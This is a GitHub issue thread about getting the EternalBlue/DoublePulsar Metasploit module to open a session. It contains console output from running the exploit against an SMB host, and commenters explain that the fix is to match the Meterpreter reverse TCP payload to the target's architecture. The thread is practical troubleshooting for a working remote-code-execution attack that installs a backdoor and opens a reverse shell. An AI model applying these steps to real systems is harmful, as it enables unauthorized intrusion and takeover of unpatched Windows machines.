### ISSUE TITLE
Error sending wrong architecture DLL to target

### ISSUE THREAD

**Issue by xforjustice** [ElevenPaths/Eternalblue-Doublepulsar-Metasploit#17]
Hi,
I keep getting this error trying to execute the attack:

msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] 192.168.1.72:445 - Generating Eternalblue XML data
[*] 192.168.1.72:445 - Generating Doublepulsar XML data
[*] 192.168.1.72:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.72:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.72:445 - Launching Eternalblue...
[+] 192.168.1.72:445 - Backdoor is already installed
[*] 192.168.1.72:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 192.168.1.72:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

Changed the PROCESSINJECT to lsass.exe and TARGETARCHITECTURE x64

Thank you,

**Comment by xforjustice** [comment]
Solved! Please ignore. Wrong payload was used.

Thank you,

**Comment by Ben3Othman** [comment]
what is the used payload in this case please ??

**Comment by pedropabloDM** [comment]
@Ben3Othman If you are exploiting an x64 machine try `set payload windows/x64/meterpreter/reverse_tcp` if you are exploiting x86 then try `windows/meterpreter/reverse_tcp`. I entered here because of the same problem and solved that way, I even realized was the payload thanks to @xforjustice. However he didn't replied back. Hope this work for you.

**Comment by jtsamas** [comment]
@pedropabloDM Your solution worked; I forgot about the payload type depends on the architecture one is trying to exploit. That worked for me .Cheers mate
